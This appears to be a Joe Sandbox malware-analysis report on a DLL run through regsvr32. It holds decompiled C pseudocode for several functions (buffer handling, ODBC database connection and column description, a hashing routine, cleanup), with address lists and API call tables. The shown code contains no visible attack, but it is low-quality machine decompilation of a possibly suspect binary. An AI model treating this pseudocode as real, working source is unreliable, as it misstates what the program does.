				signed int _t160;
				void* _t164;
				signed int _t171;
				void* _t172;
				void* _t173;
				int _t181;
				void* _t182;
				signed int _t183;
				signed int _t187;
				signed int _t189;
				void* _t194;
				signed int _t196;
				int _t207;
				signed int _t208;
				void* _t224;
				signed int _t225;
				void* _t227;
				void* _t232;
				signed int _t233;
				intOrPtr _t235;
				void* _t236;
				signed int _t240;
				signed int _t241;
				signed int _t249;
				void* _t250;
				signed int _t251;
				intOrPtr _t252;
				signed int _t253;
				signed char* _t254;
				void* _t257;
				void** _t260;
				signed int _t261;
				signed int _t262;
				void* _t263;
				void* _t264;
				void* _t265;
				void* _t266;

				_t153 =  *(_t265 + 0x34);
				_t261 =  *_t153;
				_t207 = _t153[3];
				 *(_t265 + 0xc) = _t153[2];
				_t240 =  *(_t261 + 5) & 0x000000ff;
				 *(_t265 + 0x24) =  *(_t261 + 4) & 0x000000ff;
				 *(_t265 + 0x18) = _t261;
				 *(_t265 + 0x28) = _t240 & 0x00000001;
				_t241 = _t240 & 0x00000004;
				_t257 = 0;
				 *(_t265 + 0x18) = _t240 & 0x00000002;
				 *(_t265 + 0x3c) = _t241;
				_t154 = E10011FF0(_t241, _t153);
				_t266 = _t265 + 4;
				_t260 =  *(_t266 + 0x40);
				 *(_t266 + 0x34) = _t241;
				 *((intOrPtr*)(_t266 + 0x30)) = _t154;
				 *(_t266 + 0x24) = ((( *(_t261 + 0x11) & 0x000000ff) << 0x00000008 |  *(_t261 + 0x10) & 0x000000ff) << 0x00000008 |  *(_t261 + 0xf) & 0x000000ff) << 0x00000008 |  *(_t261 + 0xe) & 0x000000ff;
				_t249 = _t260[9];
				 *(_t266 + 0x44) = _t249;
				_t262 =  *(_t261 + 0x1a) & 0x000000ff;
				 *(_t266 + 0x18) = _t262;
				_t159 = _t260[3];
				 *(_t266 + 0x20) = ((( *(_t261 + 0x15) & 0x000000ff) << 0x00000008 |  *(_t261 + 0x14) & 0x000000ff) << 0x00000008 |  *(_t261 + 0x13) & 0x000000ff) << 0x00000008 |  *(_t261 + 0x12) & 0x000000ff;
				if(_t159 != 0) {
					_t30 =  &(_t260[2]);
					 *_t30 = _t260[2] - _t159;
					if( *_t30 != 0) {
						memmove( *_t260, _t159 +  *_t260, _t260[2]);
						_t249 =  *(_t266 + 0x50);
						_t266 = _t266 + 0xc;
					}
					_t260[3] = _t257;
				}
				if(_t249 != 0) {
					_t196 = _t260[7] - _t249;
					if(_t196 != 0) {
						memmove(_t260[4], _t260[4] + _t249 * 4, _t196 << 2);
						memmove(_t260[5], _t260[5] +  *(_t266 + 0x50) * 8, _t260[7] -  *(_t266 + 0x50) << 3);
						_t249 =  *(_t266 + 0x5c);
						_t266 = _t266 + 0x18;
					}
					_t260[7] = _t260[7] - _t249;
					_t260[8] = _t260[8] - _t249;
					_t260[9] = _t257;
				}
				_t160 =  *(_t266 + 0x24);
				if(_t160 == _t260[0x54]) {
					if( *((intOrPtr*)(_t266 + 0x28)) > _t257) {
						goto L9;
					} else {
						_t224 = 1 + _t262;
						_t250 = _t260[6];
						if(_t250 <= _t260[7] + _t224) {
							_t189 = _t250 + 0x20 + _t224;
							_t260[6] = _t189;
							_t260[4] = realloc(_t260[4], _t189 << 2);
							_t194 = realloc(_t260[5], _t260[6] << 3);
							_t266 = _t266 + 0x10;
							_t260[5] = _t194;
						}
						_t164 = _t260[0x55];
						if( *(_t266 + 0x20) != _t164) {
							_t253 = _t260[8];
							_t263 = _t260[7];
							 *(_t266 + 0x44) = _t253;
							if(_t253 < _t263) {
								_t236 = _t260[2];
								_t264 = _t263 -  *(_t266 + 0x44);
								_t254 = _t260[4] + _t253 * 4;
								do {
									_t187 =  *_t254 & 0x000000ff;
									_t254 =  &(_t254[4]);
									_t236 = _t236 - _t187;
									_t260[2] = _t236;
									_t264 = _t264 - 1;
								} while (_t264 != 0);
								_t253 =  *(_t266 + 0x44);
								_t164 = _t260[0x55];
							}
							_t262 =  *(_t266 + 0x18);
							_t260[7] = _t253;
							if(_t164 != 0xffffffff) {
								 *(_t260[4] + _t253 * 4) = 0x400;
								_t260[7] = _t260[7] + 1;
								_t260[8] = _t260[8] + 1;
							}
						}
						if( *((intOrPtr*)(_t266 + 0x2c)) != _t257) {
							_t233 = _t260[7];
							if(_t233 < 1 ||  *((intOrPtr*)(_t260[4] + _t233 * 4 - 4)) == 0x400) {
								 *(_t266 + 0x14) = 0;
								if(_t262 > 0) {
									_t235 =  *((intOrPtr*)(_t266 + 0x10));
									_t252 =  *((intOrPtr*)(_t266 + 0x1c));
									do {
										_t183 =  *(_t252 + _t257 + 0x1b) & 0x000000ff;
										_t257 = _t257 + 1;
										_t235 = _t235 + _t183;
										_t207 = _t207 - _t183;
										 *((intOrPtr*)(_t266 + 0x10)) = _t235;
									} while (_t183 >= 0xff && _t257 < _t262);
								}
							}
						}
						if(_t207 != 0) {
							_t232 = _t260[1];
							if(_t232 <= _t260[2] + _t207) {
								_t181 = _t232 + 0x400 + _t207;
								_t260[1] = _t181;
								_t182 = realloc( *_t260, _t181);
								_t266 = _t266 + 8;
								 *_t260 = _t182;
							}
							memcpy( *_t260 + _t260[2],  *(_t266 + 0x14), _t207);
							_t266 = _t266 + 0xc;
							_t260[2] = _t260[2] + _t207;
						}
						_t208 = _t207 | 0xffffffff;
						if(_t257 < _t262) {
							do {
								_t251 =  *( *((intOrPtr*)(_t266 + 0x1c)) + _t257 + 0x1b) & 0x000000ff;
								 *(_t260[4] + _t260[7] * 4) = _t251;
								_t227 = _t260[5];
								_t171 = _t260[7];
								 *((intOrPtr*)(_t227 + _t171 * 8)) = 0xffffffff;
								 *((intOrPtr*)(_t227 + 4 + _t171 * 8)) = 0xffffffff;
								if( *(_t266 + 0x14) != 0) {
									 *(_t260[4] + _t260[7] * 4) =  *(_t260[4] + _t260[7] * 4) | 0x00000100;
									 *(_t266 + 0x14) = 0;
								}
								if(_t251 < 0xff) {
									_t208 = _t260[7];
								}
								_t260[7] = _t260[7] + 1;
								_t257 = _t257 + 1;
								_t172 = _t260[7];
								if(_t251 < 0xff) {
									_t260[8] = _t172;
								}
							} while (_t257 < _t262);
							if(_t208 != 0xffffffff) {
								_t173 = _t260[5];
								 *((intOrPtr*)(_t173 + _t208 * 8)) =  *((intOrPtr*)(_t266 + 0x30));
								 *(_t173 + 4 + _t208 * 8) =  *(_t266 + 0x34);
							}
						}
						if( *((intOrPtr*)(_t266 + 0x38)) != 0) {
							_t225 = _t260[7];
							_t260[0x52] = 1;
							if(_t225 > 0) {
								 *((intOrPtr*)(_t260[4] + _t225 * 4 - 4)) =  *(_t260[4] + _t225 * 4 - 4) | 0x00000200;
							}
						}
						_t260[0x55] = 1 +  *(_t266 + 0x20);
						return 0;
					}
				} else {
					L9:
					return _t160 | 0xffffffff;
				}
			}

0x100123d3
0x100123da
0x100123df
0x100123e2
0x100123ea
0x100123ee
0x100123f7
0x100123fb
0x10012405
0x10012409
0x1001240b
0x1001240f
0x10012413
0x1001241c
0x1001241f
0x10012423
0x10012430
0x10012453
0x1001245b
0x10012463
0x1001246b
0x10012474
0x10012478
0x1001247b
0x10012481
0x10012483
0x10012483
0x10012486
0x10012491
0x10012496
0x1001249a
0x1001249a
0x1001249d
0x1001249d
0x100124a2
0x100124a7
0x100124a9
0x100124b7
0x100124d1
0x100124d6
0x100124da
0x100124da
0x100124dd
0x100124e0
0x100124e3
0x100124e3
0x100124e6
0x100124f0
0x10012501
0x00000000
0x10012503
0x10012506
0x10012509
0x10012510
0x10012515
0x10012517
0x10012526
0x10012533
0x10012538
0x1001253b
0x1001253b
0x1001253e
0x10012548
0x1001254a
0x1001254d
0x10012550
0x10012556
0x1001255b
0x1001255e
0x10012562
0x10012565
0x10012565
0x10012568
0x1001256b
0x1001256d
0x10012570
0x10012570
0x10012573
0x10012577
0x10012577
0x1001257d
0x10012581
0x10012587
0x1001258c
0x10012593
0x10012596
0x10012596
0x10012587
0x1001259d
0x1001259f
0x100125a5
0x100125b6
0x100125bc
0x100125be
0x100125c2
0x100125c6
0x100125c6
0x100125cb
0x100125cc
0x100125ce
0x100125d0
0x100125d4
0x100125c6
0x100125bc
0x100125a5
0x100125e1
0x100125e6
0x100125ed
0x100125f5
0x100125fa
0x100125fd
0x10012602
0x10012605
0x10012605
0x10012612
0x10012617
0x1001261a
0x1001261a
0x1001261d
0x10012622
0x10012624
0x10012630
0x10012638
0x1001263b
0x1001263e
0x10012641
0x10012648
0x10012650
0x10012658
0x10012661
0x10012661
0x1001266b
0x1001266d
0x1001266d
0x10012670
0x10012673
0x10012674
0x1001267d
0x1001267f
0x1001267f
0x10012682
0x10012689
0x1001268b
0x10012692
0x10012699
0x10012699
0x10012689
0x100126a2
0x100126a4
0x100126a7
0x100126b3
0x100126b8
0x100126b8
0x100126b3
0x100126c6
0x100126d4
0x100126d4
0x100124f2
0x100124f2
0x100124fc
0x100124fc

APIs

memmove.MSVCRT ref: 10012491
memmove.MSVCRT ref: 100124B7
memmove.MSVCRT ref: 100124D1
realloc.MSVCRT ref: 10012521
realloc.MSVCRT ref: 10012533
realloc.MSVCRT ref: 100125FD
memcpy.MSVCRT ref: 10012612

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 100089AD, Relevance: 10.6, APIs: 7, Instructions: 65

C-Code - Quality: 50%

			E100089AD(void* __ecx, intOrPtr* _a4) {
				void _v8;
				char _v12;
				char _v16;
				char _v2064;
				void* _t16;
				struct HWND__* _t20;
				struct HWND__* _t21;
				char* _t22;
				void* _t23;
				void* _t27;
				void* _t28;
				intOrPtr* _t31;

				_t27 = __ecx;
				_t16 =  &_v8;
				_t31 = 0;
				_push(_t16);
				_push( *0x1002c53c);
				_v12 = 0;
				_push(2);
				L10007383();
				if(_t16 == 0) {
					_push(1);
					_push( &_v12);
					_push(0x400);
					_push( &_v2064);
					_push(0);
					_push(0);
					_t20 = GetForegroundWindow();
					_push(_t20);
					_push(_v8);
					L100073B9();
					_t21 = _t20;
					if(_t21 == 0 || _t21 == 1) {
						_t22 =  &_v16;
						_push(_t22);
						_push(_v8);
						_push(3);
						L10007383();
						if(_t22 != 0) {
							goto L4;
						} else {
							_t23 = HeapAlloc( *0x10028080, 8, 0x20);
							_t31 = _a4;
							_t28 = _t23;
							 *((intOrPtr*)(_t28 + 8)) = _v16;
							 *_t28 = _v8;
							 *_t31 = 0x1002c540;
							 *(_t31 + 4) = _t28;
						}
					} else {
						E10008B11(_t27, _v8, 2);
						L4:
						_push(_v8);
						L100073B3();
						_push(_v8);
						_push(2);
						L1000739B();
					}
				}
				return _t31;
			}

0x100089ad
0x100089b7
0x100089ba
0x100089bc
0x100089bd
0x100089c3
0x100089c6
0x100089c8
0x100089d0
0x100089d2
0x100089d7
0x100089d8
0x100089e3
0x100089e4
0x100089e5
0x100089e6
0x100089ec
0x100089ed
0x100089f0
0x100089f5
0x100089f8
0x10008a26
0x10008a29
0x10008a2a
0x10008a2d
0x10008a2f
0x10008a37
0x00000000
0x10008a39
0x10008a43
0x10008a49
0x10008a4c
0x10008a51
0x10008a57
0x10008a59
0x10008a5f
0x10008a5f
0x100089ff
0x10008a04
0x10008a0b
0x10008a0b
0x10008a0e
0x10008a13
0x10008a16
0x10008a18
0x10008a18
0x100089f8
0x10008a23

APIs

SQLAllocHandle.ODBC32(00000002,?), ref: 100089C8
GetForegroundWindow.USER32 ref: 100089E6
SQLDriverConnectW.ODBC32(?,00000000), ref: 100089F0
SQLDisconnect.ODBC32(?,00000003,?,?,?,00000000), ref: 10008A0E
SQLFreeHandle.ODBC32(00000002,?,?,00000003,?,?,?,00000000), ref: 10008A18
SQLAllocHandle.ODBC32(00000003,?,?,?,00000000), ref: 10008A2F
HeapAlloc.KERNEL32(00000008,00000020,00000003,?,?,?,00000000), ref: 10008A43

Part of subcall function 10008B11: SQLGetDiagFieldW.ODBC32(?,?,00000001,00000006,10028168,00004000,?,?,00000001,?,100086C1,?,00000003,?,?,00000000), ref: 10008B37

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000875C, Relevance: 9.1, APIs: 6, Instructions: 92

C-Code - Quality: 48%

			E1000875C(char _a4) {
				short _v4;
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				short _v40;
				char _v48;
				signed int _v52;
				char _v56;
				char _v60;
				char _v64;
				char* _t38;
				signed int _t39;
				short _t42;
				char* _t47;
				signed int _t66;
				char _t68;
				void* _t70;

				_t68 = _a4;
				_v8 = 0;
				if( *((intOrPtr*)(_t68 + 0xc)) == 0 &&  *((intOrPtr*)(_t68 + 4)) != 0) {
					_t38 =  &_a4;
					_push(_t38);
					_push( *((intOrPtr*)(_t68 + 4)));
					L100073A1();
					if(_t38 == 0) {
						_t39 = _v4;
						 *(_t68 + 0x10) = _t39;
						 *((intOrPtr*)(_t68 + 0xc)) = HeapAlloc( *0x10028080, 0, _t39 << 2);
						_t66 = 0;
						_t42 = 0;
						if(0 >= _v4) {
							L8:
							return _t42;
						} else {
							goto L4;
						}
						do {
							L4:
							_push( &_v28);
							_push( &_v24);
							_push( &_v12);
							_push( &_v20);
							_t47 =  &_v16;
							_push(_t47);
							_push(0);
							_push(0);
							_t16 = _t66 + 1; // 0x1
							_t70 = _t16;
							_push(_t70);
							_push( *((intOrPtr*)(_t68 + 4)));
							L1000737D();
							if(_t47 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)(_t68 + 0xc)) + _t66 * 4)) = HeapAlloc( *0x10028080, 0, 2);
							} else {
								 *((intOrPtr*)( *((intOrPtr*)(_t68 + 0xc)) + _t66 * 4)) = HeapAlloc( *0x10028080, 0, 2 + _v52 * 2);
								_push( &_v64);
								_push( &_v60);
								_push( &_v48);
								_push( &_v56);
								_push( &_v52);
								_push(_v52 + 1);
								_push( *((intOrPtr*)( *((intOrPtr*)(_t68 + 0xc)) + _t66 * 4)));
								_push(_t70);
								_push( *((intOrPtr*)(_t68 + 4)));
								L1000737D();
							}
							_t42 = _v40;
							_t66 = _t66 + 1;
						} while (_t66 < _t42);
						goto L8;
					}
				}
				return _t38;
			}

0x10008761
0x10008767
0x1000876e
0x1000877d
0x10008781
0x10008782
0x10008785
0x1000878d
0x10008793
0x100087a0
0x100087b0
0x100087b3
0x100087b5
0x100087bc
0x1000885d
0x00000000
0x00000000
0x00000000
0x00000000
0x100087c2
0x100087c2
0x100087c6
0x100087cb
0x100087d0
0x100087d5
0x100087d6
0x100087da
0x100087db
0x100087dd
0x100087df
0x100087df
0x100087e2
0x100087e3
0x100087e6
0x100087ee
0x1000884c
0x100087f0
0x1000880a
0x10008811
0x10008816
0x1000881b
0x10008820
0x10008825
0x1000882b
0x1000882f
0x10008832
0x10008833
0x10008836
0x10008836
0x1000884f
0x10008854
0x10008855
0x00000000
0x100087c2
0x1000878d
0x10008864

APIs

SQLNumResultCols.ODBC32(?,?), ref: 10008785
HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 100087AE
SQLDescribeColW.ODBC32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?), ref: 100087E6
HeapAlloc.KERNEL32(00000000,?,?,00000001,00000000,00000000,?,?,?,?,?,?,?,?), ref: 10008805
SQLDescribeColW.ODBC32(?,00000001,?,?,?,?,?,?,?,?,?,?), ref: 10008836
HeapAlloc.KERNEL32(00000000,00000002,?,00000001,00000000,00000000,?,?,?,?,?,?,?,?), ref: 10008847

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10008909, Relevance: 9.1, APIs: 6, Instructions: 61

C-Code - Quality: 45%

			E10008909(void* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void _v8;
				char _v12;
				void* _t16;
				void* _t18;
				char* _t19;
				void* _t20;
				void* _t25;
				intOrPtr* _t29;

				_push(__ecx);
				_push(__ecx);
				_t16 =  &_v8;
				_t29 = 0;
				_push(_t16);
				_push( *0x1002c53c);
				_push(2);
				L10007383();
				if(_t16 == 0) {
					_push(0xfffffffd);
					_push(_a16);
					_push(0xfffffffd);
					_push(_a12);
					_push(0xfffffffd);
					_push(_a8);
					_push(_v8);
					L100073AD();
					_t18 = _t16;
					if(_t18 == 0 || _t18 == 1) {
						_t19 =  &_v12;
						_push(_t19);
						_push(_v8);
						_push(3);
						L10007383();
						if(_t19 != 0) {
							goto L4;
						} else {
							_t20 = HeapAlloc( *0x10028080, 8, 0x20);
							_t29 = _a4;
							_t25 = _t20;
							 *((intOrPtr*)(_t25 + 8)) = _v12;
							 *_t25 = _v8;
							 *_t29 = 0x1002c540;
							 *(_t29 + 4) = _t25;
						}
					} else {
						E10008B11(__ecx, _v8, 2);
						L4:
						_push(_v8);
						L100073B3();
						_push(_v8);
						_push(2);
						L1000739B();
					}
				}
				return _t29;
			}

0x1000890c
0x1000890d
0x1000890f
0x10008912
0x10008914
0x10008915
0x1000891b
0x1000891d
0x10008925
0x10008927
0x10008929
0x1000892c
0x1000892e
0x10008931
0x10008933
0x10008936
0x10008939
0x1000893e
0x10008941
0x1000896f
0x10008972
0x10008973
0x10008976
0x10008978
0x10008980
0x00000000
0x10008982
0x1000898c
0x10008992
0x10008995
0x1000899a
0x100089a0
0x100089a2
0x100089a8
0x100089a8
0x10008948
0x1000894d
0x10008954
0x10008954
0x10008957
0x1000895c
0x1000895f
0x10008961
0x10008961
0x10008941
0x1000896c

APIs

SQLAllocHandle.ODBC32(00000002,?), ref: 1000891D
SQLConnectW.ODBC32(?,?,000000FD,?,000000FD,?,000000FD,00000002,?), ref: 10008939
SQLDisconnect.ODBC32(?,00000003,?,?,?,?,000000FD,?,000000FD,?,000000FD,00000002,?), ref: 10008957
SQLFreeHandle.ODBC32(00000002,?,?,00000003,?,?,?,?,000000FD,?,000000FD,?,000000FD,00000002,?), ref: 10008961
SQLAllocHandle.ODBC32(00000003,?,?,?,?,000000FD,?,000000FD,?,000000FD,00000002,?), ref: 10008978
HeapAlloc.KERNEL32(00000008,00000020,00000003,?,?,?,?,000000FD,?,000000FD,?,000000FD,00000002,?), ref: 1000898C

Part of subcall function 10008B11: SQLGetDiagFieldW.ODBC32(?,?,00000001,00000006,10028168,00004000,?,?,00000001,?,100086C1,?,00000003,?,?,00000000), ref: 10008B37

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10010BB0, Relevance: 7.6, APIs: 5, Instructions: 150

C-Code - Quality: 95%

			E10010BB0() {
				signed int _t46;
				signed int _t47;
				unsigned int _t57;
				signed int _t60;
				signed int _t64;
				void* _t66;
				int _t69;
				signed int _t70;
				void* _t71;
				void* _t72;
				signed int _t73;
				signed int _t77;
				unsigned int _t84;
				signed char* _t85;
				unsigned int _t86;
				signed int _t87;
				int _t88;
				unsigned int _t92;
				void* _t95;
				void* _t97;
				signed int _t98;
				void* _t99;
				signed int _t100;
				void* _t101;
				signed int _t103;
				void* _t104;
				void* _t106;

				_t46 =  *(_t104 + 0xc);
				_t100 =  *(_t104 + 0xc);
				_t87 =  *(_t104 + 0x24);
				_t69 = _t46 *  *(_t104 + 0x18) * _t87;
				 *(_t104 + 0x24) = _t69;
				if( *(_t100 + 0x5c) >= _t69) {
					L5:
					_t84 =  *(_t104 + 0x20);
					_t70 = 0;
					_t72 =  *(_t100 + 0x58);
					__eflags = _t84;
					if(_t84 != 0) {
						_t103 =  *(_t104 + 0x18);
						do {
							_t98 = 0;
							__eflags = _t46;
							if(_t46 != 0) {
								do {
									_t64 =  *( *((intOrPtr*)(_t103 + _t98 * 4)) + _t70 * 4);
									__eflags = _t87;
									if(_t87 != 0) {
										_t86 = _t87;
										do {
											 *_t72 = _t64;
											_t72 = _t72 + 1;
											_t64 = _t64 >> 8;
											_t86 = _t86 - 1;
											__eflags = _t86;
										} while (_t86 != 0);
									}
									_t46 =  *(_t104 + 0x1c);
									_t98 = _t98 + 1;
									__eflags = _t98 - _t46;
								} while (_t98 < _t46);
								_t84 =  *(_t104 + 0x20);
							}
							_t70 = _t70 + 1;
							__eflags = _t70 - _t84;
						} while (_t70 < _t84);
						_t100 =  *(_t104 + 0x14);
					}
					_t73 =  *(_t100 + 0x10);
					_t88 =  *(_t104 + 0x24);
					_t71 =  *(_t100 + 0x58);
					_t47 = _t73 + _t88;
					 *(_t100 + 0x10) = _t47;
					__eflags = _t47 - _t73;
					if(_t47 < _t73) {
						_t28 = _t100 + 0x14;
						 *_t28 =  *(_t100 + 0x14) + 1;
						__eflags =  *_t28;
					}
					_t95 = 0x40 - (_t73 & 0x0000003f);
					__eflags = 0x40 - _t88;
					if(0x40 <= _t88) {
						memcpy(_t100 - 0x40 + 0x58, _t71, 0x40);
						_t101 = _t100 + 0x18;
						E100114F0(_t101, 0x10);
						_push(_t101);
						_push( *((intOrPtr*)(_t104 + 0x2c)));
						E10010E60();
						_t88 = _t88 - 0x40;
						_t104 = _t104 + 0x1c;
						_t71 = _t71 + _t95;
						 *(_t104 + 0x24) = _t88;
						__eflags = _t88 - 0x40;
						if(_t88 >= 0x40) {
							_t57 = _t88 >> 6;
							__eflags = _t57;
							 *(_t104 + 0x1c) = _t57;
							do {
								__eflags =  *0x1002c378;
								memcpy(_t101, _t71, 0x10 << 2);
								_t106 = _t104 + 0xc;
								_t92 = 0x10;
								_t97 = _t101;
								if(__eflags != 0) {
									_t85 = _t97 + 2;
									do {
										_t77 = _t85[1] & 0x000000ff;
										_t97 = _t97 + 4;
										_t60 =  *_t85 & 0x000000ff;
										_t85 =  &(_t85[4]);
										 *(_t97 - 4) = ((_t77 << 0x00000008 | _t60) << 0x00000008 |  *(_t85 - 5) & 0x000000ff) << 0x00000008 |  *(_t85 - 6) & 0x000000ff;
										_t92 = _t92 - 1;
										__eflags = _t92;
									} while (_t92 != 0);
								}
								_push(_t101);
								_push( *((intOrPtr*)(_t106 + 0x18)));
								E10010E60();
								_t104 = _t106 + 8;
								_t88 =  *((intOrPtr*)(_t106 + 0x2c)) - 0x40;
								_t71 = _t71 + 0x40;
								_t43 = _t104 + 0x1c;
								 *_t43 =  *(_t104 + 0x1c) - 1;
								__eflags =  *_t43;
								 *(_t104 + 0x24) = _t88;
							} while ( *_t43 != 0);
						}
					} else {
						_t101 = _t100 - _t95 + 0x58;
					}
					memcpy(_t101, _t71, _t88);
					return 1;
				} else {
					_t99 = realloc( *(_t100 + 0x58), _t69);
					_t104 = _t104 + 8;
					if(_t99 != 0) {
						L4:
						_t46 =  *(_t104 + 0x1c);
						 *(_t100 + 0x58) = _t99;
						 *(_t100 + 0x5c) = _t69;
						goto L5;
					} else {
						free( *(_t100 + 0x58));
						_t66 = malloc(_t69);
						_t104 = _t104 + 8;
						 *(_t100 + 0x58) = _t66;
						if(_t66 != 0) {
							goto L4;
						} else {
							return _t66;
						}
					}
				}
			}

0x10010bb0
0x10010bb6
0x10010bc3
0x10010bc7
0x10010bca
0x10010bd1
0x10010c0f
0x10010c0f
0x10010c13
0x10010c15
0x10010c18
0x10010c1a
0x10010c1c
0x10010c20
0x10010c20
0x10010c22
0x10010c24
0x10010c26
0x10010c2a
0x10010c2d
0x10010c2f
0x10010c31
0x10010c33
0x10010c33
0x10010c35
0x10010c36
0x10010c39
0x10010c39
0x10010c39
0x10010c33
0x10010c3c
0x10010c40
0x10010c41
0x10010c41
0x10010c45
0x10010c45
0x10010c49
0x10010c4a
0x10010c4a
0x10010c4e
0x10010c4e
0x10010c52
0x10010c55
0x10010c59
0x10010c5c
0x10010c5f
0x10010c62
0x10010c64
0x10010c66
0x10010c66
0x10010c66
0x10010c66
0x10010c71
0x10010c73
0x10010c75
0x10010c8b
0x10010c90
0x10010c96
0x10010c9b
0x10010c9c
0x10010ca0
0x10010ca5
0x10010ca7
0x10010caa
0x10010cac
0x10010cb0
0x10010cb3
0x10010cb7
0x10010cb7
0x10010cba
0x10010cc0
0x10010cc0
0x10010cd0
0x10010cd0
0x10010cd2
0x10010cd7
0x10010cd9
0x10010cdb
0x10010ce0
0x10010ce0
0x10010ce4
0x10010ce7
0x10010cea
0x10010d04
0x10010d07
0x10010d07
0x10010d07
0x10010ce0
0x10010d0a
0x10010d0b
0x10010d0f
0x10010d18
0x10010d1b
0x10010d1e
0x10010d21
0x10010d21
0x10010d21
0x10010d25
0x10010d25
0x10010cc0
0x10010c77
0x10010c79
0x10010c79
0x10010d2e
0x10010d3f
0x10010bd3
0x10010bdd
0x10010bdf
0x10010be4
0x10010c05
0x10010c05
0x10010c09
0x10010c0c
0x00000000
0x10010be6
0x10010be9
0x10010bf0
0x10010bf6
0x10010bf9
0x10010bfe
0x00000000
0x10010c04
0x10010c04
0x10010c04
0x10010bfe
0x10010be4

APIs

realloc.MSVCRT ref: 10010BD7
free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10010BE9
malloc.MSVCRT ref: 10010BF0
memcpy.MSVCRT ref: 10010C8B
memcpy.MSVCRT ref: 10010D2E

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000B5B0, Relevance: 7.6, APIs: 5, Instructions: 116

C-Code - Quality: 86%

			E1000B5B0() {
				intOrPtr _t49;
				signed int _t53;
				void* _t55;
				intOrPtr _t59;
				void* _t72;
				void* _t74;
				intOrPtr _t80;
				intOrPtr* _t83;
				intOrPtr* _t84;
				void* _t86;
				signed int _t88;
				struct _IO_FILE* _t89;
				intOrPtr* _t90;
				signed int _t91;
				void* _t92;
				void* _t93;
				void* _t94;

				_t90 =  *((intOrPtr*)(_t92 + 0xc));
				_t91 = 0;
				if( *((intOrPtr*)( *_t90)) != 9) {
					E10010D40( *((intOrPtr*)(_t90 + 4)) + 0xe7c,  *((intOrPtr*)(_t90 + 4)) + 0xe1c);
					_t49 =  *((intOrPtr*)(_t90 + 4));
					_t93 = _t92 + 8;
					__eflags =  *(_t49 + 0xfc);
					if( *(_t49 + 0xfc) != 0) {
						_t74 =  *(_t49 + 0x1c4);
						__eflags = _t74;
						if(_t74 != 0) {
							free(_t74);
							_t93 = _t93 + 4;
							 *((intOrPtr*)( *((intOrPtr*)(_t90 + 4)) + 0x1c4)) = 0;
							 *((intOrPtr*)( *((intOrPtr*)(_t90 + 4)) + 0xfc)) = 0;
						}
					}
					E1000FA00( *((intOrPtr*)( *((intOrPtr*)(_t90 + 4)) + 0x3c)));
					_t94 = _t93 + 4;
					_t86 = 0x40;
					do {
						_t53 =  *(_t86 +  *((intOrPtr*)(_t90 + 4)));
						__eflags = _t53;
						if(_t53 != 0) {
							_t72 = _t53 + 0xfffffff0;
							__eflags = _t72;
							free(_t72);
							_t94 = _t94 + 4;
							 *(_t86 +  *((intOrPtr*)(_t90 + 4))) = _t91;
						}
						_t55 =  *(_t86 +  *((intOrPtr*)(_t90 + 4)) + 0xdb0);
						__eflags = _t55;
						if(_t55 != 0) {
							free(_t55);
							_t94 = _t94 + 4;
